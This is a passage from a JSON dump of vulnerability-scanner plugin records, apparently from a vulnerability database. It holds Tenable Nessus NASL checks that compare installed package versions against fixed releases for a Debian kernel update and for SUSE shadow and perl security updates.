prefix:\"linux-image-4.9.0-0.bpo.7-amd64-dbg\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-armmp\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-armmp-lpae\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-marvell\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-rt-686-pae\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-rt-686-pae-dbg\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-rt-amd64\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-rt-amd64-dbg\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-kbuild-4.9\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-manual-4.9\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-perf-4.9\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-source-4.9\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-support-4.9.0-0.bpo.7\", reference:\"4.9.110-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-07-21T11:57:47", "references": ["http://www.nessus.org/u?1cef69f4", "https://bugzilla.suse.com/1099310", "https://www.suse.com/security/cve/CVE-2016-6252.html"], "pluginID": "111202", "description": "This update for shadow fixes the following issues :\n\n - CVE-2016-6252: Fixed incorrect integer handling that could results in a local privilege escalation (bsc#1099310)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-07-20T00:00:00", "title": "SUSE SLES12 Security Update : shadow (SUSE-SU-2018:1995-1)", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-21T11:57:47", "vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6252"], "modified": "2018-07-20T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:shadow-debugsource", "p-cpe:/a:novell:suse_linux:shadow", "p-cpe:/a:novell:suse_linux:shadow-debuginfo"], "id": "SUSE_SU-2018-1995-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111202", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1995-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111202);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/07/20 18:27:24\");\n\n script_cve_id(\"CVE-2016-6252\");\n\n script_name(english:\"SUSE SLES12 Security Update : shadow (SUSE-SU-2018:1995-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for shadow fixes the following issues :\n\n - CVE-2016-6252: Fixed incorrect integer handling that\n could results in a local privilege escalation\n (bsc#1099310)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1099310\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-6252.html\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181995-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1cef69f4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2018-1354=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2018-1354=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2018-1354=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:ND/RC:UC\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:X/RC:U\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:shadow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:shadow-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:shadow-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"shadow-4.1.5.1-19.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"shadow-debuginfo-4.1.5.1-19.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"shadow-debugsource-4.1.5.1-19.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"shadow-4.1.5.1-19.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"shadow-debuginfo-4.1.5.1-19.8.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"shadow-debugsource-4.1.5.1-19.8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"shadow\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-07-21T12:36:45", "references": ["https://www.suse.com/security/cve/CVE-2018-12015.html", "https://bugzilla.suse.com/1096718", "http://www.nessus.org/u?3739294d"], "pluginID": "111201", "description": "This update for perl fixes the following issues :\n\n - CVE-2018-12015: The Archive::Tar module allowed remote attackers to bypass a directory-traversal protection mechanism and overwrite arbitrary files (bsc#1096718).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-07-20T00:00:00", "title": "SUSE SLES11 Security Update : perl (SUSE-SU-2018:1992-1)", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-21T12:36:45", "vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-12015"], "modified": "2018-07-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:perl-doc", "p-cpe:/a:novell:suse_linux:perl-Module-Build", "p-cpe:/a:novell:suse_linux:perl-Test-Simple", "p-cpe:/a:novell:suse_linux:perl-base", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:perl"], "id": "SUSE_SU-2018-1992-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111201", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1992-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111201);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/07/20 18:27:24\");\n\n script_cve_id(\"CVE-2018-12015\");\n\n script_name(english:\"SUSE SLES11 Security Update : perl (SUSE-SU-2018:1992-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for perl fixes the following issues :\n\n - CVE-2018-12015: The Archive::Tar module allowed remote\n attackers to bypass a directory-traversal protection\n mechanism and overwrite arbitrary files (bsc#1096718).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/1096718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12015.html\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181992-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3739294d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-perl-13695=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-perl-13695=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-perl-13695=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-perl-13695=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-perl-13695=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-perl-13695=1\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl-Module-Build\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl-Test-Simple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:perl-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! ereg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"perl-32bit-5.10.0-64.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"perl-32bit-5.10.0-64.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"perl-5.10.0-64.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"perl-Module-Build-0.2808.01-0.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"perl-Test-Simple-0.72-0.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"perl-base-5.10.0-64.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"perl-doc-5.10.0-64.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"perl-32bit-5.10.0-64.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"perl-32bit-5.10.0-64.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"perl-5.10.0-64.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"perl-Module-Build-0.2808.01-0.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"perl-Test-Simple-0.72-0.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"perl-base-5.10.0-64.81.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"perl-doc-5.10.0-64.81.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"perl\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}]}}